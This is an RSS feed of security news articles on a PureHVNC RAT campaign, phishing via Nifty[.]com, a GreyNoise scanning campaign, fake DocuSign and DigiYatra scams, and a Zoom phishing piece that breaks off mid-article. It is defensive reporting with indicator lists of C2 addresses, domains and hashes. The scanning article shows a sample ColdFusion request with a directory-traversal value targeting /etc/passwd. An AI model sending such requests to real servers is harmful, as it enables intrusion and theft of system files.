<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>BOTNET &#8211; First Hackers News</title>
	<atom:link href="https://firsthackersnews.com/category/botnet/feed/" rel="self" type="application/rss+xml" />
	<link>https://firsthackersnews.com</link>
	<description>Latest cybersecurity news, real attacks, and practical IOCs—made simple and actionable.</description>
	<lastBuildDate>Tue, 10 Jun 2025 17:05:03 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://firsthackersnews.com/wp-content/uploads/2026/03/cropped-FHN_512x512-32x32.png</url>
	<title>BOTNET &#8211; First Hackers News</title>
	<link>https://firsthackersnews.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>PureHVNC RAT Evades Defenses with Fake Jobs &#038; PowerShell</title>
		<link>https://firsthackersnews.com/purehvnc-rat/</link>
					<comments>https://firsthackersnews.com/purehvnc-rat/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Thu, 29 May 2025 17:31:00 +0000</pubDate>
				<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Fake Jobs]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[powershell]]></category>
		<category><![CDATA[PureHVNC RAT]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security patch]]></category>
		<category><![CDATA[security update]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10282</guid>

					<description><![CDATA[<p>Netskope Threat Labs has uncovered a stealthy malware campaign delivering the PureHVNC Remote Access Trojan (RAT), using a</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/purehvnc-rat/">PureHVNC RAT Evades Defenses with Fake Jobs &amp; PowerShell</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Netskope Threat Labs has uncovered a stealthy malware campaign delivering the PureHVNC Remote Access Trojan (RAT), using a multi-layer infection chain designed to evade modern security tools.</p>



<p>Active throughout 2024, the campaign targets job seekers in the beauty and fashion industries by impersonating global brands like Bershka, Fragrance Du Bois, John Hardy, and Dear Klairs. Victims are lured with fake job offers for high-profile marketing roles.</p>



<h2 class="wp-block-heading"><strong>Social Engineering Meets Technical Evasion</strong></h2>



<p>The attack starts with a malicious LNK file disguised as a PDF—often named with a double extension like “.pdf.lnk”—to trick users into opening it. Once launched, the infection chain gives attackers full system access, allowing them to drop additional malware and tools undetected.</p>



<p>This blend of social engineering and technical evasion highlights the growing sophistication of modern malware threats and the need for advanced detection beyond traditional defenses.</p>



<p>When opened, the LNK file runs a PowerShell command that decodes a base64 script, kicking off a multi-stage process using PowerShell, JavaScript, AutoIt, and obfuscated payloads.</p>



<p>The chain downloads a fake MP4 file containing hidden JavaScript in HTML tags, which decodes more scripts to deliver and execute a PE file named “phom.exe.”</p>



<h2 class="wp-block-heading"><strong>Technical Evasion Tactics Behind the PureHVNC RAT</strong></h2>



<p>To keep the attack believable, a fake PDF job offer is shown to the user while malicious activity runs in the background. An AutoIt-compiled binary quietly executes scripts, sets up persistence by placing an internet shortcut in the Windows Startup folder, and uses process hollowing to inject a .NET payload into trusted processes like <em>jsc.exe</em> or <em>AppLaunch.exe</em>.</p>



<p>This payload—encrypted with AES-256 and protected with .NET Reactor—ultimately loads the PureHVNC RAT. Its configuration files reveal multiple campaign IDs and connections to command-and-control (C2) servers like <em>85.192.48.3</em> and <em>139.99.188.124</em>.</p>



<figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="710" height="430" src="https://firsthackersnews.com/wp-content/uploads/2025/05/image-6.png" alt="" class="wp-image-10283" srcset="https://firsthackersnews.com/wp-content/uploads/2025/05/image-6-200x121.png 200w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-6-300x182.png 300w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-6-400x242.png 400w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-6-600x363.png 600w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-6.png 710w" sizes="(max-width: 710px) 100vw, 710px" /><figcaption class="wp-element-caption"><strong>DIE Analysis of the AutoIt File</strong></figcaption></figure>



<p>The campaign is heavily obfuscated at every stage. It uses tools like CypherIT to hide AutoIt scripts and embeds junk data to evade detection. Anti-analysis checks are also built in, stopping execution if tools like <em>AvastUI.exe</em> or known antivirus emulator names are detected.</p>



<p>Persistence is reinforced by dropping files into a folder named “WordGenius Technologies” under <em>%LocalAppData%</em>, using random file names to stay under the radar.</p>



<p>The attack shows high technical skill—from string replacements in scripts to using built-in Windows tools like <em>mshta.exe</em> to run remote files—making it hard to detect with standard defenses.</p>



<p>While the initial infection method isn’t confirmed, evidence points to email delivery, especially through job offers and fake copyright warnings.</p>



<p>As PureHVNC evolves, including new delivery methods using Python scripts and AI-generated phishing sites seen in 2024, defending against these threats will require modern detection tools and constant vigilance. This campaign poses a serious risk by giving attackers full remote access for further exploitation.</p>



<h2 class="wp-block-heading"><strong>IOCs</strong></h2>



<ul class="wp-block-list">
<li><strong>Distribution addresses</strong></li>
</ul>



<pre class="wp-block-code"><code>45.151.62.2
semrush-alternative.com
sadgfua54a.xyz
</code></pre>



<ul class="wp-block-list">
<li><strong>C2 addresses</strong></li>
</ul>



<pre class="wp-block-code"><code>139.99.188.124
85.192.48.3
</code></pre>



<ul class="wp-block-list">
<li><strong>LNK files (MD5)</strong></li>
</ul>



<pre class="wp-block-code"><code>f26493ea92987113679edbcaec7234ff
b758944bbda18e8802e9d80a2cf1cf75
9060fd189774be18610dc2ff4be0745e
c656c140ab0f2b6596bf6805e15df13b
7ad407e2d94adc16470f418bf0fc708f
e1ca0780e64a73659405a87e95e0b2e7
bfb2fdddd4326cf708ba847decb0fe87
1469217ca9103001ddf88fac5d8f8bcc
72c8cbb9f13846df470766f19668363c
</code></pre>



<ul class="wp-block-list">
<li><strong>Fake MP4 files (MD5)</strong></li>
</ul>



<pre class="wp-block-code"><code>f39b82129259ef4a3fcd1a50e995957d
5d51e0196f459617b142670958d8b54a
b58b0bd6cbdc14fe0f07a4453ed77e76
d086283e23d91ecc1a7a8f5bc6c658c5
</code></pre>



<ul class="wp-block-list">
<li><strong>Compiled AutoIt files (MD5)</strong></li>
</ul>



<pre class="wp-block-code"><code>7cf7b05416a7cc98a2abb61f6ac97650
351d6757503b98fc56b0d3415f674b75
f3166a49810a3cbf658c794793c5ba8d
a46469cf5fb8c5682bed2322bb6b5029
8c6350413ea2a890f04d4b3e8e3ecb6f
d131cf27b565c942cc5d0064e8ac9a3a
0814745e941281e3eae66425f58cbe7e
</code></pre>



<ul class="wp-block-list">
<li><strong>Obfuscated AutoIt script files (MD5)</strong></li>
</ul>



<pre class="wp-block-code"><code>00e01b6a41b5527785eed1cf01351b1
4e366dbfaa07314e38ee148cb5b19cde
91ceeaf5e81a83041009c9770da29ef4
d395d4455200ec7814dd306f2ce4144c
12b8e858fdaf1469e0d7a0fb0a5f8475
460160210500b3180d0d4da2e73bf651
e7e605f842b04f5981dbcdea92f09e39</code></pre>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/purehvnc-rat/">PureHVNC RAT Evades Defenses with Fake Jobs &amp; PowerShell</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/purehvnc-rat/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Nifty[.]com Infrastructure Exploited in Phishing Attack</title>
		<link>https://firsthackersnews.com/nifty-com/</link>
					<comments>https://firsthackersnews.com/nifty-com/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Thu, 29 May 2025 17:15:00 +0000</pubDate>
				<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Compromised]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Nifty[.]com Infrastructure]]></category>
		<category><![CDATA[phishing attacks]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security update]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10279</guid>

					<description><![CDATA[<p>Between April and May 2025, threat actors launched a multi-wave phishing campaign by exploiting the trusted infrastructure of</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/nifty-com/">Nifty[.]com Infrastructure Exploited in Phishing Attack</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Between April and May 2025, threat actors launched a multi-wave phishing campaign by exploiting the trusted infrastructure of Nifty[.]com, a major Japanese ISP. </p>



<p>Instead of spoofing domains, they registered free consumer accounts and sent phishing emails through Nifty’s own mail servers—such as mta-snd-e0X.mail.nifty[.]com—using IP ranges like 106.153.226.0/24 and 106.153.227.0/24.</p>



<p>Discovered by Raven, a leading threat detection firm, the campaign bypassed traditional email defenses by passing SPF, DKIM, and DMARC checks. This allowed the emails to evade most secure email gateways (SEGs), which rely heavily on broken authentication or known bad domains to detect threats.</p>



<p>The operation unfolded in several waves, starting on April 28 with lures themed around an “Execution Agreement,” followed by waves on May 7 and May 16 using “SAFE Agreement” themes. A spike in activity occurred on May 23, when dozens of emails were sent in under a minute—indicating automation and likely phishing kit usage.</p>



<p>Instead of links, emails carried attachments like PDFs and HTML files (e.g., <em>SAFE_Terms_May2025.pdf</em>, <em>Execution_Agreement.html</em>) that triggered redirect chains via legitimate tracking tools, ultimately leading to phishing sites hosted on obfuscated domains such as 2vf78gnafutdc5zqmhng[.]iqmwpx[.]ru. </p>



<p>These sites were designed to steal credentials and hijack Gmail sessions through token theft.</p>



<h2 class="wp-block-heading"><strong>Adaptive Attack Waves Exploit Trust and Evasion Tactics</strong></h2>



<p>The phishing campaign leveraging Nifty[.]com didn’t rely on crude techniques—it evolved with each wave, making detection increasingly difficult. Attackers used advanced evasion methods such as HTML padding with whitespace characters, multipart MIME structures to conceal payloads, and display name spoofing like “Name via DocuSign.” </p>



<p>The emails also featured AI-generated content with near-perfect grammar, allowing them to slip past conventional security filters.</p>



<p>Raven, the threat detection firm that uncovered this campaign, flagged it through behavioral anomalies—unusual sender-recipient patterns, repeated contract-themed lures, consistent attachment naming, and redirect chains leading to suspicious domains.</p>



<p>These indicators helped detect threats that otherwise looked legitimate on the surface.</p>



<p>This medium-to-high sophistication attack highlights a major blind spot in traditional email security systems. With valid SPF, DKIM, and DMARC, and no malicious links in the message body, most secure email gateways failed to flag these emails as threats.</p>



<p>The use of authenticated infrastructure, coupled with adaptive and stealthy delivery techniques, reflects a growing trend: phishing actors are embedding themselves within trusted environments to boost success rates.</p>



<p>Raven’s ability to detect this campaign—even with clean headers and valid authentication—proves the importance of advanced detection methods. Organizations must move beyond outdated filters and adopt tools that analyze behavior, content context, and hidden redirection techniques.</p>



<p><strong>To stay ahead, email defenses must evolve to detect not just what’s obviously malicious, but what subtly blends in.</strong></p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/nifty-com/">Nifty[.]com Infrastructure Exploited in Phishing Attack</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/nifty-com/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cloud Devices Under Attack: 251 IPs Exploit 75 Flaws</title>
		<link>https://firsthackersnews.com/cloud-devices/</link>
					<comments>https://firsthackersnews.com/cloud-devices/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 28 May 2025 15:52:28 +0000</pubDate>
				<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[251 IPs Exploit]]></category>
		<category><![CDATA[75 flaws]]></category>
		<category><![CDATA[Cloud Devices]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security flaw]]></category>
		<category><![CDATA[security patch]]></category>
		<category><![CDATA[security update]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10271</guid>

					<description><![CDATA[<p>On May 8, 2025, cybersecurity analysts at GreyNoise identified a large-scale and tightly coordinated scanning campaign that swept</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/cloud-devices/">Cloud Devices Under Attack: 251 IPs Exploit 75 Flaws</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p><span style="font-size: revert; color: initial;">On </span>May 8, 2025<span style="font-size: revert; color: initial;">, cybersecurity analysts at </span>GreyNoise<span style="font-size: revert; color: initial;"> identified a large-scale and tightly coordinated scanning campaign that swept across </span>75 known exposure points<span style="font-size: revert; color: initial;"> on the internet—all within a 24-hour window.</span> </p>



<p>The operation was launched using 251 unique IP addresses, all geolocated to Japan and hosted by Amazon Web Services (AWS). </p>



<p>These IPs were inactive before and after the campaign, indicating the likely use of temporary, rented cloud infrastructure to carry out the scan and then disappear—a tactic often seen in professional, stealthy attacks.</p>



<p>Instead of random, opportunistic probing, this was a targeted operation, carefully mapped out and likely automated, suggesting it was centrally planned using custom tooling or orchestration scripts.</p>



<p>The attackers were not just scanning at random—they were actively probing for known vulnerabilities and misconfigurations across a wide range of commonly deployed enterprise systems. GreyNoise detected 75 distinct behaviors as part of the campaign, including:</p>



<p><strong>Exploitation Attempts for Known CVEs:</strong></p>



<ul class="wp-block-list">
<li><strong>Adobe ColdFusion</strong> – CVE-2018-15961 (Remote Code Execution)</li>



<li><strong>Apache Struts</strong> – CVE-2017-5638 (OGNL Injection)</li>



<li><strong>Elasticsearch</strong> – CVE-2015-1427 (Groovy Sandbox RCE)</li>



<li><strong>Atlassian Confluence</strong> – CVE-2022-26134 (OGNL Injection)</li>



<li><strong>Bash (Shellshock)</strong> – CVE-2014-6271</li>
</ul>



<p><strong>Other Activities:</strong></p>



<ul class="wp-block-list">
<li>Scanning for vulnerable CGI scripts</li>



<li>Exposing environment variables</li>



<li>Checking for leaked <code>.git</code> directories or config files</li>



<li>Attempting shell uploads</li>



<li>Performing <strong>WordPress author enumeration</strong> (to prepare for brute-force or privilege escalation)</li>
</ul>



<p>For example, the tag <strong>“ColdFusion RCE Attempt”</strong> would be triggered if GreyNoise detects exploit traffic like this in HTTP requests:</p>



<p>POST /cfide/adminapi/base.cfc?method=login HTTP/1.1<br>Host: vulnerable-server<br>Content-Type: application/x-www-form-urlencoded<br>Content-Length: 45</p>



<p>cfcPath=../../../../../../../../etc/passwd</p>



<p>This request tries to access system files using directory traversal, a clear sign of an attack attempt.</p>



<h2 class="wp-block-heading"><strong>Recommended Defensive Actions</strong></h2>



<ul class="wp-block-list">
<li>Monitor for GreyNoise tags associated with known CVEs</li>



<li>Block AWS-sourced scanning activity where appropriate</li>



<li>Review logs for abnormal HTTP requests or access attempts</li>



<li>Patch systems affected by the listed CVEs</li>



<li>Harden public-facing apps against common misconfigurations</li>
</ul>



<h3 class="wp-block-heading">Risk Factors</h3>



<figure class="wp-block-table"><table><thead><tr><th>Risk Factor</th><th>Description</th><th>Severity</th><th>Mitigation</th></tr></thead><tbody><tr><td>Legacy CVEs</td><td>Old, unpatched flaws still being targeted</td><td>High</td><td>Patch regularly, scan for vulns</td></tr><tr><td>Edge Infrastructure</td><td>Tools can scan wide areas quickly</td><td>High</td><td>Audit systems, segment networks</td></tr><tr><td>Cloud IP Rotation</td><td>Attackers use throwaway IPs to bypass blocks</td><td>Medium</td><td>Use dynamic blocking, threat intel</td></tr><tr><td>Misconfig Scans</td><td>Looks for weak setups and leaked settings</td><td>Medium</td><td>Harden configs, monitor constantly</td></tr><tr><td>Broad Recon</td><td>Attackers hit any weak point, not just one</td><td>High</td><td>Assess overall security posture</td></tr><tr><td>Automation &amp; Orchestration</td><td>Attacks run fast using single toolsets</td><td>High</td><td>Automate detection</td></tr></tbody></table></figure>



<p>The May 8 campaign shows how fast and advanced cloud-driven attacks have become. Organizations need to:</p>



<ul class="wp-block-list">
<li><strong>Patch known CVEs</strong></li>



<li><strong>Use real-time threat intelligence</strong></li>



<li><strong>Monitor edge and legacy systems closely</strong></li>
</ul>



<p>These types of scans often come just before major zero-day exploits, so acting quickly is key to staying secure.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>&#x200d;Follow Us on:<strong> <a href="https://twitter.com/Info_FHNews" target="_blank" rel="noreferrer noopener">Twitter</a>,<a href="https://www.instagram.com/first_hackers_news/" target="_blank" rel="noreferrer noopener"> Instagram</a>, <a href="https://www.linkedin.com/in/firsthackers-news/" target="_blank" rel="noreferrer noopener">Facebook</a></strong> to get the latest security news!</strong></p>
</blockquote>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/cloud-devices/">Cloud Devices Under Attack: 251 IPs Exploit 75 Flaws</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/cloud-devices/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Threat Actors Use Fake DocuSign for Corporate Data Theft</title>
		<link>https://firsthackersnews.com/docusign/</link>
					<comments>https://firsthackersnews.com/docusign/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Tue, 27 May 2025 17:05:55 +0000</pubDate>
				<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Compromised]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[Corporate Data Theft]]></category>
		<category><![CDATA[DocuSign]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security patch]]></category>
		<category><![CDATA[security update]]></category>
		<category><![CDATA[threat actors]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10258</guid>

					<description><![CDATA[<p>DocuSign is trusted by over 1.6 million customers, including 95% of Fortune 500 companies, and has more than</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/docusign/">Threat Actors Use Fake DocuSign for Corporate Data Theft</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>DocuSign is trusted by over 1.6 million customers, including 95% of Fortune 500 companies, and has more than a billion users. But its popularity has also made it a major target for cybercriminals.</p>



<h3 class="wp-block-heading">Why DocuSign Is Being Abused</h3>



<p>Attackers are using fake DocuSign emails to trick people into sharing login credentials or financial details. These phishing messages often look like real DocuSign requests, asking users to “review documents” through yellow buttons or QR codes.</p>



<p>Clicking these links or scanning the QR codes takes users to fake sites—often designed to look like Microsoft login pages—where sensitive information is stolen.</p>



<p>QR-based phishing is especially dangerous because mobile devices often lack strong security tools, making it easier for attackers to slip through undetected.</p>



<p>These attacks don’t just steal data—they can lead to full network breaches, allowing attackers to move across systems, gain higher access, or even install ransomware.</p>



<p>Cybercriminals are now using real DocuSign accounts to send phishing emails that look completely legitimate. These fake emails often pretend to come from suppliers, government offices, or even HR departments.</p>



<p>Some scams involve fake invoices to steal money. Others use refund fraud tricks, asking people to share personal details over the phone. Some attackers even use DocuSign’s APIs to create official-looking notifications that blend trust with deception.</p>



<p>These scams can lead to:</p>



<ul class="wp-block-list">
<li>Unauthorized access to company systems</li>



<li>Financial losses</li>



<li>Personal data leaks on the dark web</li>
</ul>



<p>A single compromised account can quickly snowball into a much larger breach.</p>



<h3 class="wp-block-heading">How to Stay Protected</h3>



<p>According to an ESET report, businesses should use a <strong>multi-layered security approach</strong>:</p>



<ul class="wp-block-list">
<li>Train employees to spot phishing emails. Look out for strange sender addresses, odd grammar, or mismatched email signatures.</li>



<li>Don’t click links in DocuSign emails. Real DocuSign messages include a security code—log in directly on their site to access documents.</li>



<li>Use multi-factor authentication (MFA) to protect all business accounts.</li>



<li>Enforce strong passwords with a password manager.</li>



<li>Install advanced security tools like ESET to detect malicious links and attachments.</li>



<li>Report suspicious emails to your IT team and DocuSign’s official spam reporting channel.</li>
</ul>



<h3 class="wp-block-heading">In Case of a Breach</h3>



<p>If you suspect a compromise:</p>



<ul class="wp-block-list">
<li>Change passwords immediately</li>



<li>Scan for malware</li>



<li>Isolate affected devices</li>



<li>Monitor the dark web for leaked data</li>
</ul>



<p>DocuSign makes online workflows easier—but always double-check emails before clicking. Trust should never replace caution in today’s threat landscape.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>&#x200d;Follow Us on:<strong> <a href="https://twitter.com/Info_FHNews" target="_blank" rel="noreferrer noopener">Twitter</a>,<a href="https://www.instagram.com/first_hackers_news/" target="_blank" rel="noreferrer noopener"> Instagram</a>, <a href="https://www.linkedin.com/in/firsthackers-news/" target="_blank" rel="noreferrer noopener">Facebook</a></strong> to get the latest security news!</strong></p>
</blockquote>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/docusign/">Threat Actors Use Fake DocuSign for Corporate Data Theft</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/docusign/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Fake DigiYatra Apps Steal Indian Financial Data</title>
		<link>https://firsthackersnews.com/digiyatra-apps/</link>
					<comments>https://firsthackersnews.com/digiyatra-apps/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Mon, 26 May 2025 15:36:00 +0000</pubDate>
				<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Compromised]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[DigiYatra Apps]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security flaw]]></category>
		<category><![CDATA[security patch]]></category>
		<category><![CDATA[security update]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10245</guid>

					<description><![CDATA[<p>A new phishing scam is targeting Indian air travelers by pretending to be the trusted DigiYatra service. This</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/digiyatra-apps/">Fake DigiYatra Apps Steal Indian Financial Data</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A new phishing scam is targeting Indian air travelers by pretending to be the trusted DigiYatra service. This fake website, digiyatra[.]in, looks like the real government-backed travel platform but is actually stealing personal and financial information from users.</p>



<p>The site mimics a genuine flight booking service, using professional design and SSL encryption to appear trustworthy. Visitors see a familiar travel booking page with flight search options and promises like “lowest fare guaranteed” and “easy booking process.”</p>



<p>But behind this facade, the site is capturing sensitive data such as names, phone numbers, emails, and possibly financial details, tricking users into thinking they’re using an official government service.</p>



<p>InfoSec Write-ups analysts found the malicious domain is part of an impersonation campaign active since July 2022. ThreatWatch360 researchers reported the site is hosted on IP 167[.]172[.]151[.]4 and uses a Let’s Encrypt SSL certificate to seem secure.</p>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="586" src="https://firsthackersnews.com/wp-content/uploads/2025/05/image-5-1024x586.png" alt="" class="wp-image-10246" srcset="https://firsthackersnews.com/wp-content/uploads/2025/05/image-5-200x115.png 200w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-5-300x172.png 300w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-5-400x229.png 400w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-5-600x344.png 600w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-5-768x440.png 768w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-5-800x458.png 800w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-5-1024x586.png 1024w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-5.png 1100w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Source – Medium</em></figcaption></figure>



<p>The domain is registered under the name Ali Sajil from Kerala, India, though this may be fake.</p>



<p>This phishing attack poses a serious risk to India’s digital services by damaging public trust and exposing users to identity theft and financial fraud. It comes at a time when digital travel services are growing in popularity, making the threat even more concerning.</p>



<h3 class="wp-block-heading">How the Scam Works</h3>



<p>The fake website uses advanced techniques to appear legitimate and collect user data. The domain name digiyatra[.]in was chosen to match the real DigiYatra brand and trick users.</p>



<p>It uses an SSL certificate that includes both the main domain and an app subdomain (app.digiyatra.in), hinting at possible plans to fake a mobile app as well.</p>



<p>The site’s design closely copies real travel booking platforms but doesn’t actually process any bookings. Instead, it collects personal information, which may be sold on the dark web or used for future scams targeting Indian citizens.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>&#x200d;Follow Us on:<strong> <a href="https://twitter.com/Info_FHNews" target="_blank" rel="noreferrer noopener">Twitter</a>,<a href="https://www.instagram.com/first_hackers_news/" target="_blank" rel="noreferrer noopener"> Instagram</a>, <a href="https://www.linkedin.com/in/firsthackers-news/" target="_blank" rel="noreferrer noopener">Facebook</a></strong> to get the latest security news!</strong></p>
</blockquote>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/digiyatra-apps/">Fake DigiYatra Apps Steal Indian Financial Data</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/digiyatra-apps/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zoom Phishing Steals Login Credentials</title>
		<link>https://firsthackersnews.com/zoom/</link>
					<comments>https://firsthackersnews.com/zoom/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Mon, 19 May 2025 17:28:00 +0000</pubDate>
				<category><![CDATA[Compromised]]></category>
		<category><![CDATA[BOTNET]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Login credentials]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[scam]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security update]]></category>
		<category><![CDATA[security vulnerability]]></category>
		<category><![CDATA[zoom]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=10198</guid>

					<description><![CDATA[<p>A new phishing campaign is tricking users with fake Zoom meeting invites that appear to come from coworkers.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/zoom/">Zoom Phishing Steals Login Credentials</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A new phishing campaign is tricking users with fake Zoom meeting invites that appear to come from coworkers.</p>



<p>The scam uses familiar work-related messaging to steal login credentials.</p>



<p>Researchers warn that the fake meeting page looks convincing, even showing a video of fake “participants” to make it seem real.</p>



<p>The urgent tone in the email pushes users to click links quickly, increasing the risk of falling for the scam.</p>



<figure class="wp-block-image size-full"><img decoding="async" width="520" height="787" src="https://firsthackersnews.com/wp-content/uploads/2025/05/image-3.png" alt="" class="wp-image-10199" srcset="https://firsthackersnews.com/wp-content/uploads/2025/05/image-3-198x300.png 198w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-3-200x303.png 200w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-3-400x605.png 400w, https://firsthackersnews.com/wp-content/uploads/2025/05/image-3.png 520w" sizes="(max-width: 520px) 100vw, 520px" /></figure>



<h2 class="wp-block-heading"><strong>Sophisticated Phishing Scam Targets Zoom Users</strong></h2>



<p>A new phishing scam is fooling users with fake Zoom emails that closely mimic real meeting invites. These emails copy Zoom’s branding and formatting to avoid suspicion.</p>



<p>When users click the link, they&#8217;re taken to a fake meeting page that asks for their Zoom login or other sensitive info. The fake sites use domain names that look almost identical to real ones.</p>



<p>Experts say stolen credentials can lead to wider network breaches, as attackers may use them to access company systems.</p>



<p>The phishing emails use personalized links, hinting that attackers may have prior data on targets—making the scam more believable. This approach shows a higher level of planning than usual phishing attacks.</p>



